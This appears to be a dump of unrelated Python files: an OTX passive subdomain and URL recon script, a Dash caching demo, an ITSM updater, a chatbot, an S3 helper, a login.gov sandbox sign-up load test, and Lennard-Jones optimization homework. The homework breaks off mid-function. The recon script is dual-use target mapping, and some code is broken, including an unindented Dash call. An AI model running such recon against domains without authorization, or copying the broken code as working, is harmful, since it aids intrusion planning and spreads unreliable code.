#!/usr/bin/python3
import urllib3, sys, json, os
class Recon():
    """Passive recon against AlienVault OTX for the domain in argv[1].

    Creates an output directory named after the domain; results are
    written there by the module-level script below.
    """

    def __init__(self):
        self.domain = sys.argv[1]
        self.http = urllib3.PoolManager()
        try:
            os.mkdir(sys.argv[1])
        except Exception:
            # directory already exists (or cannot be created) — keep going
            pass

    def passive_dns(self):
        """Return OTX passive-DNS records for the target domain (parsed JSON)."""
        r = self.http.request("GET",f"https://otx.alienvault.com/otxapi/indicator/hostname/passive_dns/{self.domain}")
        return json.loads(r.data.decode('utf-8'))

    def urls(self,sub):
        """Return the OTX URL list for hostname `sub` (parsed JSON)."""
        r = self.http.request("GET",f"https://otx.alienvault.com/otxapi/indicator/hostname/url_list/{sub}")
        return json.loads(r.data.decode('utf-8'))
bot = Recon()

print("[*] Looking for subdomains.....")
# fix: fetch the passive-DNS records once and reuse them for both passes
# (the original issued the same OTX API request twice) and open each
# output file once instead of re-opening it per record.
records = bot.passive_dns()["passive_dns"]

with open(f"./{bot.domain}/subdomains.txt", "a") as save_file:
    for i in records:
        if bot.domain in i["hostname"]:
            save_file.write(i["hostname"]+"\n")
            print(i["hostname"])

print("[*] Looking for urls.....")
with open(f"./{bot.domain}/urls.txt", "a") as save_file:
    for i in records:
        if bot.domain in i["hostname"]:
            for b in bot.urls(i["hostname"])["url_list"]:
                save_file.write(b["url"]+"\n")
                print(b["url"])
import dash
import dash_html_components as html
import time
from jitcache import Cache
cache = Cache()

app = dash.Dash(__name__)
server = app.server  # exposed for WSGI deployment

# One button; two outputs that both depend on the same expensive function.
app.layout = html.Div(
    children=[
        html.Button("Submit", id="button"),
        html.Div(id="output-container-button1", children=[]),
        html.Div(id="output-container-button2", children=[]),
    ]
)
# This is only called once per click: both callbacks share the memoized result.
@cache.memoize
def slow_fn(input_1, input_2):
    """Deliberately slow product of two numbers (simulates expensive work)."""
    print("Slow Function Called")
    time.sleep(1)
    return input_1 * input_2
@app.callback(
    dash.dependencies.Output("output-container-button1", "children"),
    [dash.dependencies.Input("button", "n_clicks")],
)
def update_output1(n_clicks):
    """First consumer of slow_fn; n_clicks is None before the first click."""
    input_1 = n_clicks if n_clicks is not None else 0
    input_2 = 2
    value = slow_fn(input_1, input_2)
    return f"Value is {value} and the button has been clicked {n_clicks} times"
@app.callback(
    dash.dependencies.Output("output-container-button2", "children"),
    [dash.dependencies.Input("button", "n_clicks")],
)
def update_output2(n_clicks):
    """Second consumer of slow_fn — demonstrates the shared memoized call."""
    input_1 = n_clicks if n_clicks is not None else 0
    input_2 = 2
    value = slow_fn(input_1, input_2)
    return f"Value is {value} and the button has been clicked {n_clicks} times"
if __name__ == "__main__":
app.run_server(debug=True)
|
#!/usr/local/bin/python2.7
# coding=utf8
import sys, os
import traceback
from inspect import stack
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Config'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Utility'))
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '../Model'))
from mongokit import ObjectId
from Constants import *
from Config import *
from BaseController import CBaseController
from IncidentModel import CIncidentModel
from ITSMAPIController import CITSMAPI
class CUpdateITSMIncidentController(CBaseController):
    """Pushes locally queued incident updates to the remote ITSM system.

    Python 2 code (old-style except syntax, sys.exc_traceback).
    """

    def __init__(self, **kwargs):
        super(CUpdateITSMIncidentController, self).__init__(**kwargs)

    # ---------------------------------------------------------------------------------------------- #
    def UpdateWaitingIncident(self):
        """Send every waiting incident to ITSM and record the per-incident result."""
        try:
            oIncidentModel = CIncidentModel(self.m_oConfig)
            oAPI = CITSMAPI(config=self.m_oConfig)
            if oIncidentModel is not None:
                arrWaitingInc = oIncidentModel.ListWaitingUpdateIncident()
                for oIncident in arrWaitingInc:
                    # numeric fields arrive as strings; coerce before sending
                    if oIncident['ccutime'] is not None and oIncident['ccutime'] != "":
                        oIncident['ccutime'] = int(oIncident['ccutime'])
                    if oIncident['connection'] is not None and oIncident['connection'] != "":
                        oIncident['connection'] = int(oIncident['connection'])
                    if oIncident['customerimpacted'] is not None and oIncident['customerimpacted'] != "":
                        oIncident['customerimpacted'] = int(oIncident['customerimpacted'])
                    # strip None values (Python 2 items() returns a list, so
                    # deleting while iterating is safe here)
                    for k, v in oIncident.items():
                        if v is None:
                            del oIncident[k]
                    oRs = oAPI.UpdateIncident(oIncident)
                    oRsUpdateStatus = None
                    try:
                        # resolve/reopen need an extra status-change call
                        if oIncident['incident_status'] == INCIDENT_STATUS_RESOLVE or oIncident['incident_status'] == INCIDENT_STATUS_REOPEN:
                            oRsUpdateStatus = oAPI.UpdateIncidentStatus(oIncident)
                        else:
                            oRsUpdateStatus = oRs
                    except:
                        oRsUpdateStatus = oRs
                        pass
                    oUpdateData = dict()
                    oUpdateData['sdk_update_to_itsm_status'] = ITSM_STATUS_FAIL
                    if oRs is not None and oRsUpdateStatus is not None:
                        if oRs['status'] == ITSM_STATUS_OK and oRsUpdateStatus['status'] == ITSM_STATUS_OK:
                            oUpdateData['sdk_update_to_itsm_status'] = ITSM_STATUS_OK
                        if oRs['msg'] == oRsUpdateStatus['msg']:
                            oUpdateData['sdk_last_msg'] = oRs['msg']
                        else:
                            # NOTE(review): this literal is missing its closing
                            # '}' — confirm the intended message format
                            oUpdateData['sdk_last_msg'] = '{"normal_update_msg": "%s", "status_update_msg": "%s"' % (oRs['msg'], oRsUpdateStatus['msg'])
                    else:
                        oUpdateData['sdk_last_msg'] = 'Unknown'
                    oUpdateData['sdk_last_update_to_itsm'] = Utilities.GetCurrentTimeMySQLFormat()
                    oUpdateData['sdk_update_to_itsm_count'] = {'type': MYSQL_VALUE_TYPE_EXPRESSION, 'value': 'IFNULL(sdk_update_to_itsm_count,0) + 1'}
                    oIncidentModel.UpdateWaitingUpdateIncident({'id': oIncident['sdk_id']}, oUpdateData)
                oIncidentModel.DeleteIncidentUpdateSuccess()
                oIncidentModel.CloseMySQLConnection()
        except Exception, exc:
            strErrorMsg = '%s Error: %s - Line: %s' % (str(exc), stack()[0][3], sys.exc_traceback.tb_lineno)  # give a error message
            Utilities.WriteErrorLog(strErrorMsg, self.m_oConfig)
if __name__ == '__main__':
    # Poll forever: push waiting incident updates to ITSM, then sleep.
    while(True):
        try:
            oConfig = CConfig()
            oController = CUpdateITSMIncidentController(config=oConfig)
            oController.UpdateWaitingIncident()
            #oController.Test()
            # NOTE(review): bare `exit` is a no-op name reference here;
            # `break` or exit() was probably intended.
            exit
        except Exception, exc:
            strErrorMsg = '%s Error: %s - Line: %s' % (str(exc), stack()[0][3], sys.exc_traceback.tb_lineno)  # give a error message
            Utilities.WriteErrorLog(strErrorMsg, oConfig)
            pass
        time.sleep(SLEEP_NOTIFY_ITSM_STATUS)
|
import reference
import re
import random
def main():
    """Run a tiny chatbot REPL: prompt, print the translated reply, stop on "quit".

    Note: the reply for "quit" is printed before the loop ends, matching the
    original behavior (the quit check happens after the response).
    """
    print("Hello. How are you feeling today?")
    keep_going = True
    while keep_going:
        statement = input("> ")
        print(translate(statement))
        if statement == "quit":
            keep_going = False
def translate(statement):
    """Return a random canned response for the first pattern matching *statement*.

    Punctuation ("!" and ".") is replaced with spaces before matching.
    Implicitly returns None when no pattern matches.
    """
    cleaned = statement.replace("!", " ").replace(".", " ")
    for key in reference.psychobabble_responses:
        match = re.search(reference.psychobabble_patterns[key], cleaned)
        if not match:
            continue
        reply = random.choice(reference.psychobabble_responses[key])
        return reference.format_response(match, reply)
main() |
import boto3
import sys
class AWS:
    """Thin wrapper around the boto3 S3 client for bucket and file operations.

    SECURITY: the original code embedded an AWS access key and secret key in
    the source. Hard-coded credentials are a serious leak; this version relies
    on boto3's default credential chain (environment variables, shared config,
    or an IAM role). Rotate the exposed keys immediately.
    """

    def __init__(self, bucket_name, bucket_region=None, file_name=None, key=None):
        """Store bucket/file context.

        Bug fixes vs. the original: ``file_name`` was referenced but never a
        parameter, and ``self.key key`` was a syntax error. The extra
        parameters default to None so callers that only know the bucket name
        (see the menu script) can still construct an instance.
        """
        self.bucket_name = bucket_name
        self.bucket_region = bucket_region
        self.file_name = file_name
        self.key = key

    @staticmethod
    def _client():
        # Single place to build the S3 client; credentials come from the
        # default boto3 credential chain, never from source code.
        return boto3.client('s3')

    def create_user_bucket(self, bucket_name, bucket_region):
        """Create *bucket_name* in *bucket_region* and return the response."""
        client = self._client()
        buckets = client.create_bucket(
            Bucket=bucket_name,
            CreateBucketConfiguration={'LocationConstraint': bucket_region})
        print("Created bucket {}.".format(bucket_name))
        return buckets

    def upload_file_into_bucket(self, file_name, bucket_name, key):
        """Upload local *file_name* to *bucket_name* under object *key*.

        Bug fix: ``boto3.client('s3')`` has no ``.meta.client`` attribute
        (that belongs to ``boto3.resource``); ``upload_file`` is called on the
        client directly. The method also now uses its parameters instead of
        possibly-unset instance attributes.
        """
        client = self._client()
        client.upload_file(Filename=file_name, Bucket=bucket_name, Key=key)
        print("{} with {} is successfully uploaded into {} of S3".format(file_name, key, bucket_name))

    def download_file_from_bucket(self, file_name, bucket_name, key):
        """Download object *key* from *bucket_name* into local *file_name*."""
        client = self._client()
        client.download_file(Bucket=bucket_name, Key=key, Filename=file_name)
        print("{} with {} is successfully downloaded from {} of S3".format(file_name, key, bucket_name))
if __name__ == '__main__':
    # Simple interactive menu over the AWS helper class.
    # Bug fixes vs. the original: "S2" typo in the banner, a module-level
    # `return` (syntax error), a reference to an undefined `s3` object, the
    # non-existent method name `create_bucket`, and a missing constructor
    # argument for option 1.
    print("AWS S3 services")
    print("Choose from the following services 1.create bucket 2.upload a file 3.delete a file")
    try:
        user_response = int(input("Enter the option number"))
    except ValueError:
        # Non-numeric input used to crash with an unhandled ValueError.
        print("Enter the valid option")
        sys.exit()
    if user_response not in (1, 2, 3):
        print("Enter the valid option")
        sys.exit()
    if user_response == 1:
        bucket_name = input("Enter the bucket name")
        bucket_region = input("Enter the region for the bucket")
        bucket_obj = AWS(bucket_name, bucket_region)
        # The class method is create_user_bucket, not create_bucket.
        bucket_obj.create_user_bucket(bucket_name, bucket_region)
    elif user_response == 2:
        bucket_name = input("Enter the bucket name in which you wish to upload file")
        file_name = input("Enter the file name")
        key = input("Enter the name of the file to upload")
        bucket_obj = AWS(bucket_name)
        bucket_obj.upload_file_into_bucket(file_name, bucket_name, key)
    else:  # user_response == 3
        bucket_name = input("Enter the bucket name in which you wish to upload file")
        file_name = input("Enter the file name")
        key = input("Enter the name of the file to download")
        # The original checked `s3.bucket_name.creation_date` (undefined `s3`)
        # and used a bare `return`; existence errors now surface from boto3.
        bucket_obj = AWS(bucket_name)
        bucket_obj.download_file_from_bucket(file_name, bucket_name, key)
|
from faker import Faker
from .flow_helper import (
authenticity_token,
confirm_link,
do_request,
get_env,
otp_code,
personal_key,
querystring_value,
random_phone,
resp_to_dom,
sp_signout_link,
url_without_querystring,
)
from urllib.parse import urlparse
import logging
import os
import time
"""
*** SP IAL2 Sign Up Flow ***
"""
def ial2_sign_up_async(context):
    """
    Drive a brand-new user through the full IAL2 (identity-proofing) sign-up
    flow against the SP/IdP sandbox: account creation, SMS 2FA, document
    capture, SSN, async verification polling, phone verification, personal
    key, and finally SP sign-out.

    Requires following attributes on context:
    * license_front - Image data for front of driver's license
    * license_back - Image data for back of driver's license
    """
    sp_root_url = get_env("SP_HOST")
    # Start from a clean session.
    context.client.cookies.clear()
    # GET the SP root, which should contain a login link, give it a friendly
    # name for output
    resp = do_request(
        context,
        "get",
        sp_root_url,
        sp_root_url,
        '',
        {},
        {},
        sp_root_url
    )
    sp_signin_endpoint = sp_root_url + '/auth/request?aal=&ial=2'
    # submit signin form
    resp = do_request(
        context,
        "get",
        sp_signin_endpoint,
        '',
        '',
        {},
        {},
        sp_signin_endpoint
    )
    auth_token = authenticity_token(resp)
    # GET the new email page
    resp = do_request(context, "get", "/sign_up/enter_email",
                      "/sign_up/enter_email")
    auth_token = authenticity_token(resp)
    # Post fake email and get confirmation link (link shows up in "load test mode")
    fake = Faker()
    new_email = "test+{}@test.com".format(fake.md5())
    default_password = "salty pickles"
    resp = do_request(
        context,
        "post",
        "/sign_up/enter_email",
        "/sign_up/verify_email",
        '',
        {
            "user[email]": new_email,
            "authenticity_token": auth_token,
            "user[terms_accepted]": '1'},
    )
    conf_url = confirm_link(resp)
    # Get confirmation token
    resp = do_request(
        context,
        "get",
        conf_url,
        "/sign_up/enter_password?confirmation_token=",
        '',
        {},
        {},
        "/sign_up/email/confirm?confirmation_token=",
    )
    auth_token = authenticity_token(resp)
    dom = resp_to_dom(resp)
    token = dom.find('[name="confirmation_token"]:first').attr("value")
    # Set user password
    resp = do_request(
        context,
        "post",
        "/sign_up/create_password",
        "/authentication_methods_setup",
        '',
        {
            "password_form[password]": default_password,
            "authenticity_token": auth_token,
            "confirmation_token": token,
        },
    )
    auth_token = authenticity_token(resp)
    # Select "phone" as the second-factor method.
    resp = do_request(
        context,
        "post",
        "/authentication_methods_setup",
        "/phone_setup",
        "",
        {
            "_method": "patch",
            "two_factor_options_form[selection][]": "phone",
            "authenticity_token": auth_token,
        },
    )
    # After password creation set up SMS 2nd factor
    auth_token = authenticity_token(resp)
    resp = do_request(
        context,
        "post",
        "/phone_setup",
        "/login/two_factor/sms",
        "",
        {
            "_method": "patch",
            "new_phone_form[international_code]": "US",
            "new_phone_form[phone]": random_phone(),
            "new_phone_form[otp_delivery_preference]": "sms",
            "authenticity_token": auth_token,
            "commit": "Send security code",
        },
    )
    # After password creation set up SMS 2nd factor
    # NOTE(review): this GET + POST re-submits /phone_setup with a *second*
    # random phone number immediately after the submission above -- this
    # looks like a duplicated step; confirm whether one of the two is
    # redundant before removing either.
    resp = do_request(context, "get", "/phone_setup", "/phone_setup")
    auth_token = authenticity_token(resp)
    resp = do_request(
        context,
        "post",
        "/phone_setup",
        "/login/two_factor/sms",
        '',
        {
            "_method": "patch",
            "new_phone_form[international_code]": "US",
            "new_phone_form[phone]": random_phone(),
            "new_phone_form[otp_delivery_preference]": "sms",
            "authenticity_token": auth_token,
            "commit": "Send security code",
        },
    )
    auth_token = authenticity_token(resp)
    code = otp_code(resp)
    logging.debug('/login/two_factor/sms')
    # Visit security code page and submit pre-filled OTP
    resp = do_request(
        context,
        "post",
        "/login/two_factor/sms",
        "/auth_method_confirmation",
        '',
        {"code": code, "authenticity_token": auth_token},
    )
    auth_token = authenticity_token(resp)
    # Decline adding a second authentication method; proceed to doc auth.
    resp = do_request(
        context,
        "post",
        "/auth_method_confirmation/skip",
        "/verify/doc_auth/welcome",
        "",
        {"authenticity_token": auth_token},
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/doc_auth/welcome')
    # Post consent to Welcome
    resp = do_request(
        context,
        "put",
        "/verify/doc_auth/welcome",
        "/verify/doc_auth/agreement",
        '',
        {"authenticity_token": auth_token, },
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/doc_auth/agreement')
    # Post IAL2 consent on the agreement page.
    resp = do_request(
        context,
        "put",
        "/verify/doc_auth/agreement",
        "/verify/doc_auth/upload",
        '',
        {"doc_auth[ial2_consent_given]": "1",
         "authenticity_token": auth_token, },
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/doc_auth/upload?type=desktop')
    # Choose Desktop flow
    resp = do_request(
        context,
        "put",
        "/verify/doc_auth/upload?type=desktop",
        "/verify/document_capture",
        '',
        {"authenticity_token": auth_token, },
    )
    auth_token = authenticity_token(resp)
    files = {"doc_auth[front_image]": context.license_front,
             "doc_auth[back_image]": context.license_back}
    logging.debug('verify/doc_auth/document_capture')
    # Post the license images
    resp = do_request(
        context,
        "put",
        "/verify/document_capture",
        "/verify/doc_auth/ssn",
        '',
        {"authenticity_token": auth_token, },
        files
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/doc_auth/ssn')
    # Sandbox test SSN (900-xx range is reserved for testing).
    ssn = '900-12-3456'
    resp = do_request(
        context,
        "put",
        "/verify/doc_auth/ssn",
        "/verify/doc_auth/verify",
        '',
        {"authenticity_token": auth_token, "doc_auth[ssn]": ssn, },
    )
    # There are three auth tokens on the response, get the second
    auth_token = authenticity_token(resp, 1)
    logging.debug('/verify/doc_auth/verify')
    # Verify
    expected_text = 'This might take up to a minute'
    resp = do_request(
        context,
        "put",
        "/verify/doc_auth/verify",
        "/verify/doc_auth/verify_wait",
        expected_text,
        {"authenticity_token": auth_token, },
    )
    # Poll until the asynchronous document verification finishes.
    # NOTE(review): the sandbox host is hard-coded below, so this flow only
    # detects completion against idp.pt.identitysandbox.gov -- confirm.
    while resp.url == 'https://idp.pt.identitysandbox.gov/verify/doc_auth/verify_wait':
        time.sleep(3)
        logging.debug(
            f"SLEEPING IN /verify_wait WHILE LOOP with {new_email}")
        resp = do_request(
            context,
            "get",
            "/verify/doc_auth/verify_wait",
            '',
            '',
            {},
        )
        if resp.url == 'https://idp.pt.identitysandbox.gov/verify/doc_auth/verify_wait':
            logging.debug(
                f"STILL IN /verify_wait WHILE LOOP with {new_email}")
        else:
            # Verification completed; grab the token from the next page.
            auth_token = authenticity_token(resp)
    logging.debug("/verify/phone")
    # Enter Phone
    resp = do_request(
        context,
        "put",
        "/verify/phone",
        "/verify/phone",
        'This might take up to a minute',
        {"authenticity_token": auth_token,
         "idv_phone_form[phone]": random_phone(), },
    )
    # Poll until the asynchronous phone verification finishes.
    wait_text = 'This might take up to a minute. We’ll load the next step '\
                'automatically when it’s done.'
    while wait_text in resp.text:
        time.sleep(3)
        logging.debug(
            f"SLEEPING IN /verify/phone WHILE LOOP with {new_email}")
        resp = do_request(
            context,
            "get",
            "/verify/phone",
            '',
            '',
            {},
        )
        if resp.url == 'https://idp.pt.identitysandbox.gov/verify/phone':
            logging.debug(
                f"STILL IN /verify/phone WHILE LOOP with {new_email}")
        else:
            auth_token = authenticity_token(resp)
    logging.debug('/verify/otp_delivery_method')
    # Select SMS Delivery
    resp = do_request(
        context,
        "put",
        "/verify/otp_delivery_method",
        "/verify/phone_confirmation",
        '',
        {"authenticity_token": auth_token, "otp_delivery_preference": "sms", },
    )
    auth_token = authenticity_token(resp)
    code = otp_code(resp)
    logging.debug('/verify/phone_confirmation')
    # Verify SMS Delivery
    resp = do_request(
        context,
        "put",
        "/verify/phone_confirmation",
        "/verify/review",
        '',
        {"authenticity_token": auth_token, "code": code, },
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/review')
    # Re-enter password
    resp = do_request(
        context,
        "put",
        "/verify/review",
        "/verify/personal_key",
        '',
        {
            "authenticity_token": auth_token,
            "user[password]": "salty pickles",
        },
    )
    auth_token = authenticity_token(resp)
    logging.debug('/verify/confirmations')
    # Confirmations
    resp = do_request(
        context,
        "post",
        "/verify/personal_key",
        "/sign_up/completed",
        '',
        {
            "authenticity_token": auth_token,
            "personal_key": personal_key(resp)
        },
    )
    auth_token = authenticity_token(resp)
    logging.debug('/sign_up/completed')
    # Sign Up Completed
    resp = do_request(
        context,
        "post",
        "/sign_up/completed",
        None,
        '',
        {
            "authenticity_token": auth_token,
            "commit": "Agree and continue"
        },
    )
    ial2_sig = "ACR: http://idmanagement.gov/ns/assurance/ial/2"
    # Does it include the IAL2 text signature?
    if resp.text.find(ial2_sig) == -1:
        print("ERROR: this does not appear to be an IAL2 auth")
    logout_link = sp_signout_link(resp)
    logging.debug('/sign_up/completed')
    resp = do_request(
        context,
        "get",
        logout_link,
        sp_root_url,
        '',
        {},
        {},
        url_without_querystring(logout_link),
    )
    # Does it include the logged out text signature?
    if resp.text.find('You have been logged out') == -1:
        print("ERROR: user has not been logged out")
|
# LIFO (last in, first out): a plain Python list works as a stack
# via append() to push and pop() to remove the most recent item.
books = []
for title in ("C", "C++", "C#"):
    books.append(title)
print(books)        # full stack: ['C', 'C++', 'C#']
print(books.pop())  # removes and shows the top item ('C#')
print(books)        # stack after the pop
print(books[-1])    # peek at the new top without removing it
# An empty list is falsy, so this reports when the stack runs dry.
if not books:
    print("No books left")
|
import numpy as np
from helpful_functions import *
import scipy.optimize as opt
from nelder_mead import *
def sa1():
    """
    Write a function that returns the potential energy U=∑i<j (1/r_ij^12 -1/r_ij^6)
    where r_ij is given at the top of p. 581. Apply Nelder–Mead to find the
    minimum energy for n=5. Try several initial guesses until you are convinced
    you have the absolute minimum. How many steps are required? To help you
    check your potential function when n=5, here is one correct input, output
    pair. U(1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0) = -6.0102023319615911
    """
    # Bug fix: the original assigned a simple initial guess here and then
    # immediately overwrote it with the array below; the dead assignment has
    # been removed.  Initial guess = the published optimal n=5 configuration
    # (http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html).
    ig = np.array([-0.2604720088, 0.7363147287, 0.4727061929,
                   0.2604716550, -0.7363150782, -0.4727063011,
                   -0.4144908003, -0.3652598516, 0.3405559620,
                   -0.1944131041, 0.2843471802, -0.5500413671,
                   0.6089042582, 0.0809130209, 0.2094855133])
    # Chilton advised we should use scipy.optimize over his code
    res = opt.minimize(U, ig, method='Nelder-Mead')
    # Sanity-check the potential function against the known value.
    print("Value should be -6.0102023319615911: ",
          U([1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0]))
    print('\nPotential Energy: ', res.fun)
    print('Found in ', res.nit, ' iterations.')
    print('Translated and rotated configuration: ', res.x)
    """
    We used the NElder-Mead function in the Scipy.Optimize library to find the
    minimum energey for n=5 nodes to be -9.103852, which is spot on with the
    supplied websites value. It took several initial guesses to finally get
    this value for the potential energy. After trying at least 10
    configurations, we decided to set the initial guess for the nodes to be
    the optimal configuration for n=5 nodes given at the website. It did still
    take 515 iterations to find our configuration from those initial node
    locations, which is peculiar.
    """
    return
def sa2():
    """
    Plot the five atoms in the minimum energy configuration as circles,
    and connect all circles with line segments to view the conformed
    molecule. The line segments should form triangles and there should
    be three or four lines connecting each atom. You are welcome to use
    Python or Mathematica.
    """
    # Published optimal node locations for n = 5:
    # http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
    website_pts = np.array([-0.26047, 0.73631, 0.47271, 0.26047, -0.73632, -0.47271, -0.41449, -0.36526,
                            0.34056, -0.19441, 0.28435, -0.55004, 0.60890, 0.08091, 0.20949])
    # Figure 1: the published configuration as-is.
    plot_configuration(website_pts, 'SA2_Figure1', 'Approximate Solution for $n=5$')
    # Figure 2: re-minimize from those points, then fix the gauge (first atom
    # at the origin, second on the z-axis) before plotting.
    fit = opt.minimize(U, website_pts, method='Nelder-Mead')
    gauge_fixed = translate_and_rotate(fit.x)
    plot_configuration(gauge_fixed, 'SA2_Figure2', 'Approximate Solution for $n=5$ according to RC13')
    """
    We first plot the configuration of nodes given from the optimal configuration from
    the supplied website. We then plotted the points for the configuration we found in
    SA1 where the first point is fixed at the origin and the second point is fixed on
    the z-axis.
    """
    return
def sa3():
    """
    Write a function that returns the gradient of U. Apply a Python
    minimization function that uses the function and the gradient for
    the n=5 case. Find the minimum energy as before.
    To help you check your gradient function when n=5, here is one
    correct input, output pair.
    ∇U(1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0) = [0.65625, 0.0,
    0.65625, 0.65625,0.65625,-1.3125, 0.79891,-1.45516, 0.79891,-1.3125,
    0.65625, 0.65625,-0.79891, 0.14266,-0.79891]
    """
    # Check the gradient implementation against the known value.
    print('Value should be: [0.65625, 0.0, 0.65625, 0.65625, '
          '0.65625, -1.3125, 0.79891, -1.45516, 0.79891, -1.3125, '
          '0.65625, 0.65625, -0.79891, 0.14266, -0.79891]')
    print('Value is: ', grad_U([1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 1, 0, 1, 0]))
    ig = np.array([0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0])
    # Set up boundary conditions
    b = 1.2
    bnds = ((0, 0), (0, 0), (0, 0), (0, 0), (0, 0), (-b, b), (-b, b), (-b, b),
            (-b, b), (-b, b), (-b, b), (-b, b), (-b, b), (-b, b), (-b, b))
    # Using the L-BFGS-B Method with bounds
    x_min_bounded = opt.minimize(U, ig, method='L-BFGS-B', jac=grad_U, bounds=bnds)
    points_bounded = x_min_bounded.x
    x_min_unbounded = opt.minimize(U, ig, method='L-BFGS-B', jac=grad_U)
    points_unbounded = translate_and_rotate(x_min_unbounded.x)
    # Print comparison between using bounds and not
    print('\nBounded method Potential Energy: ', x_min_bounded.fun)
    print('Found in ', x_min_bounded.nit, ' iterations.')
    print('Translated and rotated configuration: ', points_bounded)
    # Bug fix: Figure1 plots the *bounded* points, so its title now says so
    # (the original titled it "Unbounded" while plotting bounded points).
    plot_configuration(points_bounded, 'SA3_Figure1', 'Bounded Approach $n=5$ using L-BFGS-B')
    print('\nUnbounded method Potential Energy: ', x_min_unbounded.fun)
    print('Found in ', x_min_unbounded.nit, ' iterations.')
    print('Translated and rotated configuration: ', points_unbounded)
    # Bug fix: the original plotted points_bounded a second time here;
    # Figure2 is meant to show the unbounded configuration.
    plot_configuration(points_unbounded, 'SA3_Figure2', 'Unbounded Approach $n=5$ using L-BFGS-B')
    """
    Due to our results from SA5 we decided to expand this question to not only find
    the potential energy using a Scipy.Optimize function using the gradient function
    we have written, but also evaluate how including bounds changes the number of
    iterations it takes to find the optimal node configuration, and also to see if
    this affects the calculated potential energy. We found that using found the
    L-BFGS-B method found the potential energy to be -9.103852 in 39 total iterations.
    The unbounded approach using the same method found the potential energy to be
    -9.103852 in 37 total iterations. As we see their potential energy is just about
    the same, despite some machine error we encountered. The actual optimal potential
    energy for a configuration of 5 nodes is -9.103852, so both approaches were spot
    on. It is interesting, however not surprising to see that following an unbounded
    approach was more efficient. Though obvious, we must note that the node
    configurations are different.
    """
    return
def sa4():
    """
    Use one of the functions in SciPy Optimization to find the global minimum
    of your potential function when n=5 using only the potential function itself(
    not the gradient). You cannot use Nelder-Mead for this.
    """
    guess = np.array([0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 0, 1, 1, 0])
    # Powell is derivative-free, so only U itself is ever evaluated.
    result = opt.minimize(U, guess, method='Powell')
    # Fix the gauge (atom 1 at origin, atom 2 on z-axis) before reporting.
    gauge_fixed = translate_and_rotate(result.x)
    print('Potential Energy: ', result.fun)
    print('Found in ', result.nit, ' iterations.')
    print('Translated and rotated configuration: ', gauge_fixed)
    return
def sa5():
    """
    Apply the methods used in (1), (3), and (4) when n=6. Rank the methods
    according to reliability and efficiency.
    """
    # Start every solver from the published optimal n=6 configuration:
    # http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
    start = np.array([0.7430002202, 0.2647603899, -0.0468575389, -0.7430002647, -0.2647604843, 0.0468569750,
                      0.1977276118, -0.4447220146, 0.6224700350, -0.1977281310, 0.4447221826, -0.6224697723,
                      -0.1822009635, 0.5970484122, 0.4844363476, 0.1822015272, -0.5970484858, -0.4844360463])

    def run_and_report(label, **solver_kwargs):
        # Announce the solver, run it, and print the same summary lines
        # the original emitted for each method.
        print(label)
        fit = opt.minimize(U, start, **solver_kwargs)
        print('Potential Energy: ', fit.fun)
        print('Found in ', fit.nit, ' iterations.')

    # (1) Nelder-Mead simplex (derivative-free)
    run_and_report('\nUsing Nelder-Mead', method='Nelder-Mead')
    # (3) L-BFGS-B with the analytic gradient
    run_and_report('\nUsing L_BFGS_B', method='L-BFGS-B', jac=grad_U)
    # (4) Powell (derivative-free line searches)
    run_and_report('\nUsing Powell', method='Powell')
    """
    All the optimizations methods that we used are found in the Scipy.Optimization library.
    We used the Nelder-Mead, Powell, and L_FBGS_B methods. We ranked these methods according
    to efficiency as follows:
    Rank (Efficiency):
    1: L_BFGS_B - 4 iterations
    2: Powell - 5 iterations
    3: Nelder-Mead - 998 iterations,
    We then ranked the same methods according to reliability as follows:
    Rank (Reliability) (Actual PE = -12.712062):
    1: L_BFGS_B - PE: -12.712062
    2: Nelder-Mead - PE: -12.712062
    3: Powell - PE: -12.712010
    You'll noticed that when transitioning from the efficiency ranking to the reliability
    ranking, Nelder Mead and Powell have changed places. This is because Nelder-Mead
    took considerably more iterations (993), but the calculated potential energy of the
    resulting configuration is closer to the exact answer than that of the Powell method.
    Originally we rann the L_BFGS_B method with bounds to make sure that the first five
    variables were zero as part of the assignment. However this was skewing our results
    and the potential energy found through that method was approximately 0.4 off of the
    actual value. Instead of including bounds, we decided to run the resulting node
    configuration through our translate_and_rotate function, like all the other methods.
    """
    return
def sa6():
    """
    Plot the six atoms in the minimum energy configuration as circles, and
    connect all circles with line segments to view the conformed molecule.
    The line segments should form triangles and there should be four lines
    connecting each atom. You are welcome to use Python or Mathematica.
    """
    # Configuration obtained in sa5 via the unconstrained Powell run.
    raw_pts = np.array([0.67965175, 0.23750852, -0.04819455, -0.64271399, -0.23466047,
                        0.0452073 , 0.1913369 , -0.36966512, 0.57079769, -0.15485331,
                        0.37379498, -0.57404431, -0.14914537, 0.55118178, 0.40520939,
                        0.18565026, -0.54732606, -0.4087711])
    # Fix the gauge per RC13 (atom 1 at the origin, atom 2 on the z-axis),
    # then draw the molecule.
    gauge_fixed = translate_and_rotate(raw_pts)
    plot_configuration(gauge_fixed, 'SA6_Figure', 'Approximate Solution for $n=6$')
    """
    We took the optimal configuration of nodes that we found in SA 5 and ran our
    translate_and_rotate function first so that the first point would be located
    at the origin and the second point would be fixed on the z-axis. We then
    plotted this configuration.
    """
    return
def sa7():
    """
    Determine and plot minimum-energy conformations for larger n. Information
    on minimum-energy Lennard-Jones clusters for n up to several hundred is posted
    at the link provided, so your answers can be readily checked. You should do at
    least n=8.
    http://doye.chem.ox.ac.uk/jon/structures/LJ/tables.150.html
    """
    def _minimize_and_plot(start, n_label, fig_name, title):
        # Run Powell from `start`, print the same summary the original did,
